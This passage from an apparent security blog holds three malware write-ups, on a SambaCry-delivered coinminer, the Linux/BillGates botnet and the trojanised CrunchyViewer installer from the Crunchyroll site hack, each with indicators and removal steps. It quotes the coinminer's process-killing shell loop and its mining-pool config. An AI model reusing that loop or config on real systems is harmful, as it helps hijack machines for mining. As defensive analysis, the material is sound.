<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">ffe17e314f7b1306b8badec03c36ccb4 </span></td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">Fetch other payloads</span></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">httpd1</span></td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">a5e8cb2e7b84081f5b1f2867f2d26e81</span></td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">Miner config</span></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">minerd32</span></td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">a016b34ade18626f91d14e46588d6483 </span></td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">Coinminer</span></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">watchcat32</span></td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">ac9ad6bc8cd8118eaeb204c2ebf95441 </span></td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">Watchdog</span></td>
</tr>
</tbody></table>
<br />
<div>
The 'sambacry' binary will, after one of the .so files has downloaded it, download a set of other files from the C2 server, which is 45.76.102[.]45.</div>
<div>
<br /></div>
<div>
These files are to support the coin mining and, alongside installed, is also what appears to be a watchdog, which monitors the miner process. Additionally, it runs the following in a loop:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<blockquote class="tr_bq">
<i>while true </i><i>do</i><i> </i> </blockquote>
</blockquote>
<blockquote class="tr_bq">
<blockquote class="tr_bq">
<i> </i> <i>ps -ef|grep -E "wget|curl"|grep -v $$|grep -v 45.76.102.45|awk '{print $2}'|xargs kill -9</i> </blockquote>
</blockquote>
<blockquote class="tr_bq">
<blockquote class="tr_bq">
<i>done</i></blockquote>
</blockquote>
</div>
<div>
<br /></div>
<div>
Whoever's behind this campaign is using the email address madhatterss@protonmail[.]com, as defined in the miner configuration:<br />
<br />
<blockquote class="tr_bq">
<i>{<br /> "url" : "stratum+tcp://xmr.pool.minergate.com:45560",<br /> "user" : "madhatterss@protonmail.com",<br /> "pass" : "x",<br /> "algo" : "cryptonight"<br />}</i></blockquote>
<br />
While analysing both Windows and Linux artifacts, I have not observed any ransomware behaviour, so likely the latter is installed manually later on by the attacker.</div>
<div>
<br /></div>
<div>
If you run a Samba server, patch immediately, as this vulnerability has already been reported in April.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>Indicators</b></div>
<div>
<b><br /></b></div>
<div>
<script src="https://otx.alienvault.com/pulse/5a286763067de40849f87bdd.js"></script>
<b><br /></b></div>
<div>
<b><br /></b></div>
Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0tag:blogger.com,1999:blog-606282676955748155.post-70419692749817171362017-12-03T20:39:00.002+01:002017-12-03T21:04:04.398+01:00Notes on Linux/BillGates<br />
<br />
In a previous blog post, I wrote some (extensive) notes on Linux/Xor.DDoS, also known as just Xor.DDoS, an interesting type of Linux malware.<br />
<br />
You can find that particular blog below, in which I give some history, details, remediation and prevention in regards to the specific threat Xor.DDoS poses:<br />
<a href="https://bartblaze.blogspot.co.uk/2015/09/notes-on-linuxxorddos.html" target="_blank">Notes on Linux/Xor.DDoS</a><br />
<br />
This post will include some notes on Linux/BillGates, hereafter referred to as just 'BillGates', and rather than being very in-depth as the previous blog, I will mostly list high-level notes and remediation or disinfection steps. Additionally, after the conclusion, you will find other resources if necessary. In case of questions, comments or feedback, leave a <a href="https://bartblaze.blogspot.co.uk/2017/12/notes-on-linuxbillgates.html#comments" target="_blank">comment</a> or contact me on <a href="https://twitter.com/bartblaze" target="_blank">Twitter</a>.<br />
<br />
<br />
<b><span style="font-size: large;">What is BillGates?</span></b><br />
<br />
BillGates is malware designed primarily for Linux, and since it is a botnet, it is mostly used for DDoS purposes.<br />
<br />
However, just as Xor.DDoS, it has limited rootkit and backdoor functionality and thus it's possible remote commands are executed as well as additional malware downloaded.<br />
<div>
<br /></div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">How can I identify BillGates artefacts?</span></b></div>
<div>
<br /></div>
<div>
Please find below a table with indicators.</div>
<div>
<br /></div>
<table border="0" cellspacing="0">
<colgroup width="180"></colgroup>
<colgroup width="414"></colgroup>
<tbody>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><b>Indicator</b></td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><b>Notes</b></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/etc/cmd.n</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/etc/conf.n</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/etc/init.d/DbSecuritySpt</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/etc/init.d/selinux</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/etc/rc<b>X</b>.d/97DbSecuritySpt </td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Where X is a number, usually symlinks to /etc/init.d/DbSecuritySpt</td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/home/ll2 </td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Identify all files with random names in /home/</td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/tmp/.bash_root.tmp3</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/tmp/.bash_root.tmp3h</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/tmp/bill.lock </td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Identify all .lock files in /tmp/</td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/tmp/bill.lod </td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Contains Process ID (PID) of malware main module</td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/tmp/gates.lod <br />
(or gates.lock)</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Contains PID of malware main module</td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/tmp/moni.lod<br />
(or moni.lock)</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Contains PID of malware 'watchdog'</td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/tmp/notify.file</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/usr/bin/*.lock</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Identify all .lock files in /tmp/</td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/usr/bin/bsd-port/.sshd</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/usr/bin/bsd-port/*.lock</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/usr/bin/bsd-port/getty</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/usr/bin/bsd-port/getty/*.lock</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Identify all .lock files in /usr/bin/bsd-port/getty/</td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/usr/bin/pojie</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Identify all files with random names in /usr/bin/</td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/usr/lib/libamplify.so</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Configuration file</td>
</tr>
</tbody></table>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">How can I identify BillGates DDoS modules?</span></b><br />
<b><span style="font-size: large;"><br /></span></b>
These modules are usually stored in <b>/etc/</b>, and will have the following names:<br />
<br />
<ul>
<li>atddd </li>
<li>cupsdd </li>
<li>cupsddh </li>
<li>ksapdd </li>
<li>kysapdd </li>
<li>sksapdd</li>
<li>skysapdd</li>
</ul>
<br />
It may however be useful to use the find command in conjunction with these names, in case they are residing in a different location than /etc/.<br />
<br />
<br />
<b><span style="font-size: large;">How can I identify other modifications BillGates made?</span></b><br />
<b><br /></b>
BillGates does create aliases and/or modifies/replaces files which are typically used to monitor processes or the network. The following may be replaced:<br />
<br />
<br />
<ul>
<li>/bin/lsof</li>
<li>/bin/netstat</li>
<li>/bin/ps</li>
<li>/bin/ss</li>
<li>/usr/bin/lsof</li>
<li>/usr/bin/netstat</li>
<li>/usr/bin/ps</li>
<li>/usr/bin/ss</li>
<li>/usr/sbin/lsof</li>
<li>/usr/sbin/netstat</li>
<li>/usr/sbin/ps</li>
<li>/usr/sbin/ss</li>
</ul>
<br />
<div>
A copy of the legitimate files is normally stored in:</div>
<div>
<b>/usr/bin/dpkgd/</b></div>
<br />
Additionally, check for any potentially created <i>jobs</i> by looking in:<br />
<b>/etc/cron.X </b>where X is a name or folder, for example /etc/cron.daily.<br />
<br />
You may also wish to look in:<br />
<b>/var/spool/cron/</b><br />
<br />
<br />
<b><span style="font-size: large;">Removal instructions</span></b><br />
<b><span style="font-size: large;"><br /></span></b>
While the <b>ps </b>command may be replaced, <b>top</b> is not. Run the <b>top</b> command and verify any illegitimate processes, usually they will be randomly named. Alternatively, identify the *.lod and *.lock files, and use <b>cat </b>for example to read them, and identify the PID of the malware.<br />
<br />
Then, use <b>kill</b> to end the malicious process(es), and remove the files or artefacts as indicated in the table above.<br />
<br />
Afterwards, use <b>mv </b>to move the legitimate files back to their original location. You can also use a file manager to easily move them, if you have one.<br />
<br />
You may also use an anti-virus to identify and remove any malicious files, for example <a href="https://www.clamav.net/" target="_blank">ClamAV</a> does a great job - BillGates is a rather older botnet by now and thus most antiviruses should have coverage for it. Don't forget to update the anti-virus' signatures first, if needed.<br />
<br />
This same explanation but step-by-step to make it easy:<br />
<br />
<br />
<ul>
<li>Identify malicious processes: use <b>top</b> or check the PID in BillGates' config files;</li>
<li>Kill<b> </b>malicious processes: use <b>kill -9 </b><i style="font-weight: bold;"><pid> </pid></i>to kill any of its processes;</li>
<li>Remove malicious files and folders, see the sections above;</li>
<li>Replace potentially hijacked files and restore them to their original location, see also above:</li>
<li>Identify any malicious tasks and delete them as indicated above;</li>
<li>Run <b>top</b> again to verify there are no malicious processes left;</li>
<li>Run an anti-virus or anti-malware as a secondary opinion;</li>
<li>Change your passwords, better be safe than sorry!</li>
</ul>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Conclusion</span></b></div>
<div>
<b><span style="font-size: large;"><br /></span></b></div>
<div>
While Linux/BillGates may not be the biggest player on the market anymore, or even not as popular or common nowadays, the threat still exists, just like Xor.DDoS.</div>
<div>
<br /></div>
<div>
Practice proper security hygiene and take appropriate <a href="https://bartblaze.blogspot.co.uk/2015/09/notes-on-linuxxorddos.html#Prevention" target="_blank">preventative measures</a>.</div>
<div>
<br /></div>
<div>
In the resources section below, you may find additional useful links.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b><u>Resources</u></b></div>
<div>
<b><u><br /></u></b></div>
<div>
Blaze's Security Blog - <a href="https://bartblaze.blogspot.co.uk/2015/09/notes-on-linuxxorddos.html" target="_blank">Notes on Linux/Xor.DDoS</a><br />
HabraHabr - <a href="https://habrahabr.ru/post/213973/" target="_blank">Let's explore Linux Botnet "BillGates"</a></div>
<div>
Linux.com - <a href="https://www.linux.com/learn/how-move-files-using-linux-commands-or-file-managers" target="_blank">How to Move Files Using Linux Commands or File Managers</a><br />
LiquidWeb - <a href="https://www.liquidweb.com/kb/how-to-display-list-all-jobs-in-cron-crontab/" target="_blank">How to Display (List) All Jobs in Cron / Crontab</a><br />
MakeUseOf - <a href="http://www.makeuseof.com/tag/free-linux-antivirus-programs/" target="_blank">The 7 Best Free Linux Anti-Virus Programs</a><br />
MalwareMustDie - <a href="http://blog.malwaremustdie.org/2015/08/mmd-0039-2015-chinaz-made-new-malware.html" target="_blank">ChinaZ made new malware: ELF Linux/BillGates.Lite</a><br />
Netlab 360 - <a href="http://blog.netlab.360.com/new-elknot-billgates-variant-with-xor-like-c2-configuration-encryption-scheme/" target="_blank">New Elknot/Billgates Variant with XOR like C2 Configuration Encryption Scheme</a></div>
<div>
nixCraft - <a href="https://www.cyberciti.biz/faq/kill-process-in-linux-or-terminate-a-process-in-unix-or-linux-systems/" target="_blank">Kill Process in Linux or Terminate a Process in UNIX / Linux Systems</a></div>
<div>
QueQuero - <a href="https://quequero.org/2015/01/ssh-kippo-honeypot-4-months-operation-summary/" target="_blank">Inside a Kippo honeypot: how the billgates botnet spreads</a><br />
ThisIsSecurity - <a href="https://thisissecurity.stormshield.com/2015/09/30/when-elf-billgates-met-windows/" target="_blank">When ELF.BillGates met Windows</a><br />
ValdikSS (Github) - <a href="https://github.com/ValdikSS/billgates-botnet-tracker" target="_blank">BillGates botnet tracker</a></div>
</div>
Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0tag:blogger.com,1999:blog-606282676955748155.post-41181485032483935842017-11-04T16:02:00.000+01:002018-01-08T14:40:42.361+01:00CrunchyRoll hack delivers malware<br />
<b><span style="font-size: large;">Introduction</span></b><br />
<br />
There's a Reddit post today with a PSA (Public Service Announcement) about Crunchyroll, a website that offers anime streaming, being hacked:<br />
<br />
<a href="https://www.reddit.com/r/anime/comments/7aq2s7/psa_dont_enter_crunchyrollcom_at_the_moment_it/" target="_blank">PSA : Don't enter crunchyroll.com at the moment, it seems they've been hacked.</a><br />
<br />
As mentioned before, Crunchyroll offers anime streaming, and in their own words:<br />
<blockquote class="tr_bq">
<i>Enjoy your favorite anime & manga at the speed of Japan</i></blockquote>
<br />
The German Crunchyroll team has additionally issued the following warning:<br />
<br />
<br />
<blockquote class="twitter-tweet" data-lang="en">
<div dir="ltr" lang="en">
And for our English-speaking audience<br />
Please DO NOT access our website at the current time. We are aware of the issues and are working on it</div>
— Crunchyroll.de (@Crunchyroll_de) <a href="https://twitter.com/Crunchyroll_de/status/926782599460212736?ref_src=twsrc%5Etfw">November 4, 2017</a></blockquote>
<br />
The official CrunchyRoll Twitter account has tweeted the following:<br />
<br />
<blockquote class="twitter-tweet" data-lang="en">
<div dir="ltr" lang="en">
ATTENTION ALL CRUNCHYROLL USERS!!<br />
<br />
Please DO NOT access our website at the current time. We are aware of the issues and are working on it!!</div>
— Crunchyroll (@Crunchyroll) <a href="https://twitter.com/Crunchyroll/status/926813560306417664?ref_src=twsrc%5Etfw">November 4, 2017</a></blockquote>
<script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
<br />
<br />
If you are only interested in how to remove this malware, scroll down to the disinfection/removal section, or click <a href="https://bartblaze.blogspot.com/2017/11/crunchyroll-hack-delivers-malware.html#disinfection">here</a>.<br />
<br />
<br />
<b><span style="color: orange;">Update</span></b>: CrunchyRoll has announced, after a few hours, that the issue is resolved:<br />
<br />
<blockquote class="twitter-tweet" data-lang="en">
<div dir="ltr" lang="en">
We've just gotten the all-clear to say that <a href="https://t.co/x1dBCM9X9C">https://t.co/x1dBCM9X9C</a> is back online!! Thank you SO MUCH for your patience ~ ❤️ <a href="https://t.co/FQRRHowvp6">pic.twitter.com/FQRRHowvp6</a></div>
— Crunchyroll (@Crunchyroll) <a href="https://twitter.com/Crunchyroll/status/926849277430718464?ref_src=twsrc%5Etfw">November 4, 2017</a></blockquote>
<script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
<br />
<br />
However, I still advise you to scroll over to the <a href="https://bartblaze.blogspot.com/2017/11/crunchyroll-hack-delivers-malware.html#disinfection">disinfection or removal</a> section. Any questions, feel free to leave a comment, or contact me on <a href="https://twitter.com/bartblaze" target="_blank">Twitter</a>.<br />
<br />
<br />
<br />
<span style="font-size: large;"><b>Analysis</b></span><br />
<br />
So, what happens when you visit the CrunchyRoll website? Curently, you get a message the website has encountered an error:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-mKo6AOY-qbI/Wf3OfbN4J8I/AAAAAAAAB5s/NTC_gmZonLEkoIomiYjtMZdKVBrdD35mQCLcBGAs/s1600/cr.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="719" data-original-width="919" height="312" src="https://3.bp.blogspot.com/-mKo6AOY-qbI/Wf3OfbN4J8I/AAAAAAAAB5s/NTC_gmZonLEkoIomiYjtMZdKVBrdD35mQCLcBGAs/s400/cr.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - CrunchyRoll error page</td></tr>
</tbody></table>
<br />
Earlier today, the CrunchyRoll website was showing the following:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-bf2WeaAAoxw/Wf3PUC5KjKI/AAAAAAAAB6E/lH4TuK9zK_EFLoCFzAtcQwbrDpqeNV5QACLcBGAs/s1600/cr-db.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="524" data-original-width="1064" height="196" src="https://3.bp.blogspot.com/-bf2WeaAAoxw/Wf3PUC5KjKI/AAAAAAAAB6E/lH4TuK9zK_EFLoCFzAtcQwbrDpqeNV5QACLcBGAs/s400/cr-db.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Likely hacked CrunchyRoll website (<a href="https://www.reddit.com/r/anime/comments/7aq2s7/psa_dont_enter_crunchyrollcom_at_the_moment_it/" target="_blank">Image source</a>)</td></tr>
</tbody></table>
<br />
<br />
While the CrunchyRoll team claims it was a DNS hijack, I have (so far) found no evidence as to the validity of this claim, and it rather appears someone was able to hack the website.<br />
<br />
Either way, while this is bad, CrunchyRoll took swift action by taking down the website, and an investigation is under way.<br />
<br />
What happens if you click the 'Download now' button? A new file, called <i>CrunchyViewer.exe</i>, will be downloaded from the following IP address:<br />
<br />
<blockquote class="tr_bq">
109.232.225[.]12</blockquote>
<br />
This IP appears to have hosted fake antivirus software or similar in the past:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-xR-dMa_bgfE/Wf3QfTIWaAI/AAAAAAAAB6Q/_HaXRhOMozsvq87BDXGZ0X1iYlU3mEtUgCLcBGAs/s1600/cr-pt.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="637" data-original-width="997" height="255" src="https://1.bp.blogspot.com/-xR-dMa_bgfE/Wf3QfTIWaAI/AAAAAAAAB6Q/_HaXRhOMozsvq87BDXGZ0X1iYlU3mEtUgCLcBGAs/s400/cr-pt.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - Older resolutions (2010)</td></tr>
</tbody></table>
<br />
The newly download file is <i>seemingly</i> the legitimate CrunchyViewer or Crunchyroll, but, near the end of the file, there is a chunk of Base64 encoded data appended, as seen in Figure 4:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-Pj7YaAnaYyw/Wf3OfkWxmJI/AAAAAAAAB58/-cGu31hT3EoFI0ZYUfXC2epZoBAXGtpVwCEwYBhgL/s1600/cr4.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="373" data-original-width="1187" height="125" src="https://1.bp.blogspot.com/-Pj7YaAnaYyw/Wf3OfkWxmJI/AAAAAAAAB58/-cGu31hT3EoFI0ZYUfXC2epZoBAXGtpVwCEwYBhgL/s400/cr4.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - base64 encoded data (click to enlarge)</td></tr>
</tbody></table>
<br />
Using a <a href="https://opinionatedgeek.com/Codecs/Base64Decoder" target="_blank">Base64 decoder</a>, we get a new file, called svchost.exe. This binary will place a copy of itself in the current user's %appdata%\roaming folder, for example:<br />
<br />
<i>C:\Users\<b>Yourusername</b>\AppData\Roaming\<b>svchost.exe</b></i><br />
<br />
This file will periodically call to its C2, or command-and-control server, and wait for any commands:<br />
<br />
<blockquote class="tr_bq">
145.239.41[.]131</blockquote>
<br />
Currently, it does not appear the C2 responds on that specific port (6969), however, it is online.<br />
<br />
There are claims the malware will additionally install ransomware - I have not observed this behaviour, but it is definitely possible once the C2 sends back (any) commands. <strike>More likely, it is a form of keylogger - malware that can record anything you type, and send it back to the attacker.</strike><br />
<strike><br /></strike>
<b><span style="color: orange;">Update</span></b>: It appears however, thanks to <a href="https://twitter.com/anyrun_app" target="_blank">ANY.RUN</a> for the heads-up, (analysis <a href="https://app.any.run/tasks/010df394-dad9-41dd-87ef-f80892cde074" target="_blank">here</a>) that the malware actually downloads Meterpreter, which is a default Metasploit payload.<br />
<br />
More information about Meterpreter can be found <a href="https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter" target="_blank">here</a>, but basically, it can be viewed as a backdoor, as it allows the attacker to completely control your machine. However, it does appear the C2 server only downloaded Meterpreter for a limited amount of time - as port 6969 only responded within a specific time-frame.<br />
<br />
Note that the disinfection or removal tips are still applicable in this case.<br />
<br />
<i>Svchost.exe</i> will also create an autorun entry:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-Yw2QdTwh3VY/Wf3SjJ71lXI/AAAAAAAAB6c/jbkEx4tdeCAIXXbKOAvwY7M7xsc1w_ioQCLcBGAs/s1600/cr5.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="238" data-original-width="750" height="126" src="https://1.bp.blogspot.com/-Yw2QdTwh3VY/Wf3SjJ71lXI/AAAAAAAAB6c/jbkEx4tdeCAIXXbKOAvwY7M7xsc1w_ioQCLcBGAs/s400/cr5.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 5 - newly created run key <span style="font-size: 12.8px;">(click to enlarge)</span></td></tr>
</tbody></table>
<br />
This basically means the malware will start every time you (re)boot or restart the machine.<br />
<br />
Just for fun, it appear that the miscreant's name, or the person responsible for creating the malware is named Ben, as appears from the debug paths:<br />
<br />
<blockquote class="tr_bq">
<i>C:\Users\<b>Ben</b>\Desktop\taiga-develop\bin\Debug\Taiga.pdb</i> </blockquote>
<blockquote class="tr_bq">
<i>c:\users\<b>ben</b>\source\repos\svchost\Release\svchost.pdb</i></blockquote>
<br />
<a href="https://github.com/erengy/taiga" target="_blank">Taiga</a> is 'A lightweight anime tracker for Windows'. This does <b>not </b>mean they are involved, but rather that 'Ben' has decided to include Taiga in the package.<br />
<br />
<b><span style="color: orange;">Update</span></b>: the developer of Taiga has included a fix for 'CrunchyViewer':<br />
<a href="https://github.com/erengy/taiga/issues/489">https://github.com/erengy/taiga/issues/489</a><br />
<br />
Thus, if you now update or install the official Taiga application, it will prompt you if the malware is found, and is able to remove it.<br />
<br />
<br />
<b><span id="disinfection" span="" style="font-size: large;">Disinfection/Removal</span></b><br />
<br />
Disinfection is rather straightforward:<br />
<br />
<br />
<ul>
<li>Remove the malicious "Java" Run key, by opening <b>Regedit</b>, and browsing to:<br /><i>HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</i></li>
<li>Delete the '<b>Java</b>'<b> </b>key;</li>
</ul>
<ul>
<li><b>Reboot</b> your machine;</li>
</ul>
<ul>
<li>Remove the malicious binary, by navigating to:<br /><b>%appdata%\Roaming </b>(for example<b>: <i style="font-weight: normal;">C:\Users\<b>Yourusername</b>\AppData\Roaming\)</i></b></li>
<li>Delete the 'svchost.exe' file.</li>
</ul>
<div>
<ul>
<li>Perform a scan with your installed antivirus product;</li>
<li>Perform a scan with an online antivirus, which is different from the one you have. Alternatively, perform a scan with <a href="https://www.malwarebytes.com/" target="_blank">Malwarebytes</a>.</li>
<li>Change all your passwords if possible. Better be safe than sorry.</li>
</ul>
</div>
<br />
<br />
<br />
<b><span style="font-size: large;">Prevention</span></b><br />
<br />
<br />
Prevention advise in general, which also pertains to CrunchyRoll's compromise:<br />
<br />
<ul>
<li>Install an antivirus;</li>
<li>Keep your browser up-to-date;</li>
<li>Install <a href="https://noscript.net/" target="_blank">NoScript</a> if you have Firefox;</li>
<li>Install a 'well-rounded' ad-blocker, for example <a href="https://github.com/gorhill/uBlock#installation" target="_blank">uBlock Origin</a> (works with most browsers);</li>
